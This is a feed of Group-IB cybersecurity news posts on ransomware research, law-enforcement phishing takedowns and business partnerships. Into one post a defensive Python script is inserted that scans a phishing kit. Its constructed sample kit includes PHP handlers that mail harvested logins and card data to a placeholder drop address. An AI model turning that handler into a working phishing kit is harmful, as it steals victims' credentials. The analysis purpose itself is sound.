Group-IB
Your daily source of cybersecurity news brought to you by Group-IB, one of the global industry leaders.
#blog #ransomware
REvil Twins: Deep Dive into Prolific RaaS Affiliates' TTPs

🔹Ransomware continues to dominate the cybercriminal scene in 2021. The number of attacks as well as the ransom demands seem to be growing quickly. According to the Ransomware Uncovered 2020-2021 report, the Ransomware-as-a-Service model, in which developers sell or lease malware to program affiliates who handle network compromise and ransomware deployment, became one of the major driving forces behind the phenomenal growth of the ransomware market.

🔹Group-IB DFIR team observed that 64% of all ransomware attacks it analyzed in 2020 came from operators using the RaaS model.

🔹In our new blog post by Oleg Skulkin, Senior Digital Forensics analyst at Group-IB, we focus on one of the most active ransomware collectives, REvil, and their RaaS program, which attracts more and more affiliates as other RaaS programs shut down.

🔹Our experts took a deep dive into the modus operandi of REvil affiliates and shared some information on various affiliates' tactics, techniques and procedures observed, so defenders can tune their detection capabilities accordingly.

🔹Make sure to save the detection tips and REvil affiliates’ TTPs mapped in accordance with MITRE ATT&CK by Group-IB DFIR team.

➡️ Click here to read the blog now.
#ransomware #groupib #reverseengineering #Ryuk #GrimAgent
Group-IB Threat Intelligence team reverse engineered the Grim Agent backdoor used in Ryuk ransomware operations for the very first time

Our latest blog comes with all the details, including Yara and Suricata rules.

Ransomware activity increased drastically over the past couple of years and became the face of cybercrime by 2021.

📄 According to the Ransomware Uncovered 2020-2021 report, the number of ransomware attacks increased by more than 150% in 2020. The attacks grew in not only number but also scale and sophistication — the average ransom demand increased by more than twofold and amounted to $170,000 in 2020.

👥 Gangs are constantly evolving. The past year saw ransomware operators change their tactics, defense evasion techniques, and procedures to ensure that their illicit business thrives. Given that ransomware attacks are conducted by humans, understanding the modus operandi and toolset used by attackers is essential for companies that want to avoid costly downtimes. Ultimately, knowing how ransomware gangs operate and being able to thwart their attacks is more cost-effective than paying ransoms.

🔹 One of the underlying trends of 2021 to keep in mind is the use of commodity malware. The infamous Ryuk ransomware gang, responsible for many high-profile cyber heists, followed suit. The most recent addition to its arsenal, which had not yet been publicly analyzed, is the malware called GrimAgent.

💡Our new blog features the first comprehensive analysis of the GrimAgent backdoor. It is intended mainly for reverse engineers, researchers and blue teams so that they can create and implement rules that help monitor this cyber threat closely.

💪The blog also provides a great illustration of our team in action.

➡️ Click here to check it out.
#mssp #gib_thf
Group-IB has signed a partnership agreement with CyberSec Services, a Managed Security Services Provider with offices in Milan and Ticino 🇮🇹🇨🇭

🤝 CyberSec Services becomes the first partner in Europe to join Group-IB’s MSSP & MDR program.

Thanks to the partnership, Italian and Swiss companies can now take advantage of Group-IB’s Threat Hunting Framework, the first single multi-tenant solution to identify and attribute cyber criminals and to detect, hunt, and respond to the most sophisticated threats in both IT and OT networks.

💬 Alessandro Aresi, CEO of CyberSec Services, comments: “We have identified Group-IB as the ideal partner for a service offering which covers the most different needs of our customers. The peculiarity of Group-IB is the completeness of their solutions and the ability to make their portfolio compatible and complementary to an MSSP such as CyberSec Services.

One of the most interesting aspects for us, besides the consolidated experience in the field of Cyber Threat Intelligence and Investigation, is the ability to let the more traditional world of IT converge with the world of OT. This aspect allowed us, for example, to best serve one of our most relevant customers, who wanted to outsource full protection of their power plants and of the entire IT infrastructure from one single hand, with considerable savings in time and costs”.
#interpol #phishing #fraud #carding
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor presumably responsible for multiple attacks worldwide.

👥 According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.

⚔️ The alleged perpetrator, who turned out to be a citizen of Morocco, was arrested in May by the Moroccan police based on the data about his cybercrimes that was provided by Group-IB.

🧑‍💻 The starting point of Group-IB’s research to identify and deanonymize the cybercriminal was the extraction, by Group-IB’s Threat Intelligence & Attribution system, of a phishing kit (a tool used to create phishing web pages) that abused the brand of a large French bank.

🔁 The set-up of the detected phishing kit followed a common technique: a spoofed website of the targeted company, and the mass distribution of emails impersonating it that asked users to enter their login information on the spoofed site. The credentials that unsuspecting victims entered on the fake page were then forwarded to the perpetrator’s email. Almost every script in the phishing kit carried its creator’s nickname, Dr HeX, and contact email address.

➡️ Curious to learn the details? Click here to read the full story!
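The post describes the two properties of such a kit that matter to an analyst: the handler script that mails harvested credentials to the operator, and the author's handle and contact address left inside the scripts. The script below is an added example (not Group-IB's code and not the kit from this investigation) of how to triage a kit for exactly those artefacts. The kit it scans is constructed inline; the handle "kit-author-handle" and the example.com addresses are placeholders, and the regular expressions are heuristics for the common PHP kit layout, not a general PHP parser.

```python
"""Triage a phishing kit's scripts for exfiltration sinks and author artefacts.

Added example; not code from Group-IB or from the investigation described
above. The kit below is constructed by hand to mimic the common pattern the
post describes: a spoofed login form whose handler mails harvested
credentials to the operator, with the kit author's handle left in comments.
"""
import re
from collections import Counter

# Constructed sample kit (file name -> source). Handle and addresses are
# placeholders, not artefacts from any real kit.
SAMPLE_KIT = {
    "index.html": (
        '<form method="post" action="login.php">\n'
        '  <input name="user"><input name="pass" type="password">\n'
        "</form>\n"
    ),
    "login.php": (
        "<?php\n"
        "// coded by kit-author-handle\n"
        '$to = "drop.box@example.com";\n'
        "$msg = 'User: ' . $_POST['user'] . ' Pass: ' . $_POST['pass'];\n"
        'mail($to, "New Login", $msg);\n'
        'header("Location: https://bank.example/");\n'
        "?>\n"
    ),
    "send.php": (
        "<?php\n"
        "/* kit-author-handle | kit.author@example.com */\n"
        "$recipient = 'drop.box@example.com';\n"
        "@mail($recipient, 'Card', print_r($_POST, true));\n"
        "?>\n"
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# PHP mail() call, optionally error-suppressed with '@': the usual drop sink.
MAIL_CALL_RE = re.compile(r"@?\bmail\s*\(")
# Harvested form input reaching the same file.
POST_RE = re.compile(r"\$_(?:POST|REQUEST)\b")
# Full-line '//' comments and '/* */' blocks; '//' inside URLs is skipped.
COMMENT_RE = re.compile(r"^\s*//[^\n]*|/\*.*?\*/", re.M | re.S)
# "coded by <handle>" style signatures inside comments.
BYLINE_RE = re.compile(r"\bby\s+([A-Za-z0-9_.\-]+)", re.I)


def extract_artifacts(kit):
    """Return drop addresses, exfil files, comments and author handles."""
    emails = Counter()
    exfil_files = []
    comments = []
    author_tags = set()
    for name in sorted(kit):
        src = kit[name]
        emails.update(EMAIL_RE.findall(src))
        # A file that both reads form input and calls mail() is a drop sink.
        if MAIL_CALL_RE.search(src) and POST_RE.search(src):
            exfil_files.append(name)
        for comment in COMMENT_RE.findall(src):
            comments.append((name, comment.strip()))
            author_tags.update(m.group(1) for m in BYLINE_RE.finditer(comment))
    return {
        "emails": emails,
        "exfil_files": exfil_files,
        "comments": comments,
        "author_tags": author_tags,
    }


def top_drop_address(artifacts):
    """Most frequently referenced address: the likely credential drop."""
    most_common = artifacts["emails"].most_common(1)
    return most_common[0][0] if most_common else None


if __name__ == "__main__":
    result = extract_artifacts(SAMPLE_KIT)
    print("drop address:", top_drop_address(result))
    print("exfil files:", result["exfil_files"])
    print("author tags:", sorted(result["author_tags"]))
    for file_name, text in result["comments"]:
        print(f"{file_name}: {text}")
```

On a real kit, point the same functions at the unpacked archive (read each file into the dict) and treat the most frequent address as the drop mailbox and the comment signatures as pivots for further attribution; a kit that posts credentials to a remote URL or a Telegram bot instead of mail() will need an extra sink pattern.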
#gib_thf #marketplace
Group-IB joins Palo Alto Networks Cortex XSOAR Marketplace

⭐️ Our Threat Hunting Framework Polygon, a Malware Detonation & Research platform, is now available on the Palo Alto Networks Cortex XSOAR Marketplace, the industry’s largest and most comprehensive security orchestration marketplace. The Group-IB content pack on the Cortex XSOAR Marketplace provides customers with malware detonation and behavioral analysis, and was developed by engineers with long-standing experience in investigating cybercrimes worldwide, participating in global operations with international law enforcement, incident response, and cyberattack monitoring and attribution.

🔁 Group-IB’s THF Polygon is an integral part of the company’s ecosystem of high-powered and innovative solutions for protection against previously unknown threats and targeted attacks along with investigating and responding to cybercrimes to minimize potential consequences. Be sure to have a look at the comprehensive overview to learn more.

💬 “A robust, open ecosystem is at the heart of Cortex XSOAR,” said Rishi Bhargava, VP of Product Strategy for Cortex XSOAR at Palo Alto Networks. “We are proud to welcome Group-IB to the Cortex XSOAR Marketplace ecosystem, which has 700+ integrations that enable our customers to connect disparate security tools and data sources to enable maximum efficiency in the SOC.”
#phishing #benelux
Group-IB has assisted the Dutch National Police in the operation to apprehend alleged members of a cybercriminal group codenamed “Fraud Family”

⚔️ Our Amsterdam-based team has identified the individuals behind the Dutch-speaking syndicate that develops, sells and rents sophisticated phishing frameworks, and shared their findings with the authorities. According to the police, the operation resulted in the arrest of two suspects who are thought to be the developer and seller of the phishing frameworks distributed by the Fraud Family.

🧑‍💻 Group-IB Threat Intelligence unit has been detecting massive phishing attacks against Dutch and Belgian residents since the beginning of 2020. The fake pages detected by Group-IB Threat Intelligence & Attribution system were almost identical and disguised to look like legitimate websites of the biggest local financial organizations to trick unsuspecting victims into providing their personal and banking data.

👥 A typical attack, analyzed by Group-IB researchers, started with an email, SMS, or WhatsApp message impersonating a real financial organization. Using well-known brands, fraudsters gained users’ immediate trust. These fake notifications contained malicious links to adversary-controlled phishing websites that steal payment info.

🔁 Having analyzed the technical infrastructure and phishing templates used in these fraudulent campaigns, our researchers uncovered a massive Fraud-as-a-Service operation.

💬 Dutch Public Prosecutor, Attorney Witeke Koorn said: “Digital fraud such as phishing is a social problem that requires an integrated approach. This approach involves a joint effort between the Police, Public Prosecutors, banks, government agencies and others together for investigation, prosecution and prevention."

➡️ Click here to read the full story and make sure to check out our latest blog post for detailed technical analysis of Fraud Family’s operations.
The image illustrates Fraud Family's phishing scheme
#mou #cooperation
Group-IB and CyberPeace Institute collaborate for a safer cyberspace

Earlier this week, Group-IB and the CyberPeace Institute signed a Memorandum of Understanding (MoU) to collectively mobilize action for cyber security and to strengthen ongoing cooperation across multiple areas including:

👉Sharing of knowledge and expertise on threat hunting, digital forensics and investigations
👉Technical support for threat hunting, threat intelligence, digital forensics, Incident Response and Investigations
👉Cross-border collaboration on research and development for the protection of critical information infrastructures

🔹Nick Palmer, Head of Global Business at Group-IB, welcomed the MoU and had this to say: “CyberPeace Institute is one of those organizations that makes the world a better place by ridding cyber criminals of it. With an incredible team of experienced experts, NGO constituents of CyberPeace Institute receive support in analysis and post-incident investigations. As Group-IB, and our team of experts, hold near and dear investigation and attribution of cyber criminals, it is our great pleasure to support the CyberPeace Institute with our technical analysts from Threat Intelligence, Hi Tech Crime Investigations, CERT-GIB and much more. With these types of public-private partnerships we can ensure that we work together for the good of the world in the fight against cybercrime.”

🔹 The CyberPeace Institute is an independent non-governmental organization whose mission is to ensure the rights of people to security, dignity and equity in cyberspace. The Institute works in close collaboration with relevant partners to reduce the harms from cyberattacks on people’s lives worldwide. By analyzing cyberattacks, the Institute exposes their societal impact, how international laws and norms are being violated, and advances responsible behaviour to enforce cyberpeace.

🔹“At the heart of the CyberPeace Institute’s efforts is the recognition that cyberspace is about people. We need to act collectively and collaboratively to ensure respect for people’s rights and safety. Combining our knowledge and expertise with Group-IB, this MoU is a clear signal of intent for deeper and more coordinated collaboration striving for a cyberspace at peace, for everyone, everywhere” stated Bruno Halopeau, Chief Technology Officer, CyberPeace Institute.

🔹 CyberPeace Institute’s ongoing mission includes increasing public awareness of the real-life impact of cyberattacks as well as reminding state and non-state actors of the international law and norms governing responsible behaviour in cyberspace to reduce harm and ensure the respect of the rights of people in cyberspace. This approach goes in line with one of Group-IB’s core values: zero tolerance to cybercrime, which makes us even more excited to bring our cooperation to the next level.
#pdd #education #singapore
Exciting news! We became the first cybersecurity company to join JTC’s Punggol Digital District

🤖 The district is home to top international players in cybersecurity, blockchain, robotics and smart living solutions in Singapore.

🕴At the inaugural PDD: Connecting Smartness event held earlier today, Singapore’s Minister for Trade and Industry Mr Gan Kim Yong announced Group-IB’s move into the smart district, along with three other international heavyweights in the digital sectors.

💬 “It’s a great honor for me and my company to be part of JTC’s Punggol Digital District,” commented Group-IB CEO and founder Ilya Sachkov. “I’m sure that today marks a milestone for Singapore and the Asia-Pacific region in general as we’re inaugurating a strategic project that will be leading Singapore in the implementation of its Smart Nation Initiative and will stand at the forefront of the region’s digital transformation. I feel a special responsibility for this initiative since my company, Group-IB, is the first cybersecurity company to join this smart district and we expect a great journey ahead.”

As the first cybersecurity firm to join the initiative, we will👇

🔹Bring the expertise that we accumulated over nearly two decades
🔹Become an all-inclusive cybersecurity provider to the community, bringing to it, among other solutions, Threat Intelligence & Attribution, our system for building an organization-tailored threat landscape, analyzing and attributing cyberattacks and hunting threats proactively, and Threat Hunting Framework, our solution for adversary-centric detection of targeted attacks and unknown threats in IT and OT environments.
🔹Collaborate with the Singapore Institute of Technology to develop and operate a cybersecurity testing facility in the smart district – PDD Cyberpolygon Sandzone, a tool for emulating network infrastructures of any configuration, topology or scale for both theoretical research and practical trials.
🔹Work with other players in Punggol Digital District, like the Cyber Security Agency of Singapore, the Government Technology Agency, and cybersecurity associations, to turn the district into a space of advanced cybersecurity awareness and form a risk-aware culture.

We are confident that our active presence will give students opportunities to apply knowledge in the real-world context through access to Group-IB’s solutions and monitoring systems 💪
#pdd #singapore
The Punggol Digital District brings together the Singapore Institute of Technology campus and JTC’s Business Park spaces within Punggol North to create Singapore’s first truly smart district.

It is envisioned to be a home for growth industries of the digital economy like cybersecurity and digital technology as well as an inclusive and green lifestyle destination for the surrounding community.

📽 Check out the video about this unique location, featuring our CEO Ilya Sachkov!
#blog #threatintelligence
The new Group-IB Threat Intelligence blog is here!

🧑‍💻 This post opens a series in which Group-IB team members will explain how to maximize the value of threat intelligence and attribution. We will showcase how to take advantage of different proprietary features of Group-IB’s Threat Intelligence & Attribution solution to provide better protection to customer assets and help them make more informed and balanced risk mitigation decisions.

Be sure to read today’s edition to find out 👇

🔹How wide is the market for breached databases
🔹How attackers use this compromised data to harm businesses and extract financial gain
🔹Which technologies are needed to detect and monitor breached credentials
🔹How to solve a number of threatening use cases with the “Breached DB” section of Group-IB Threat Intelligence & Attribution

➡️ Click here to read now!
#blog #threatintelligence #chineseapt
New Group-IB blog is live!

Our Threat Intelligence team discovered that the attacks on Russian government organisations in 2020, earlier attributed by SentinelOne to a Chinese nation-state threat actor, could have been carried out by two Chinese groups, #TA428 and #TaskMasters.

Group-IB researchers analysed the toolset used in the attacks, compared it with these APTs’ arsenal seen in the past, and showed how their malware has evolved.

➡️ Click here to learn more details!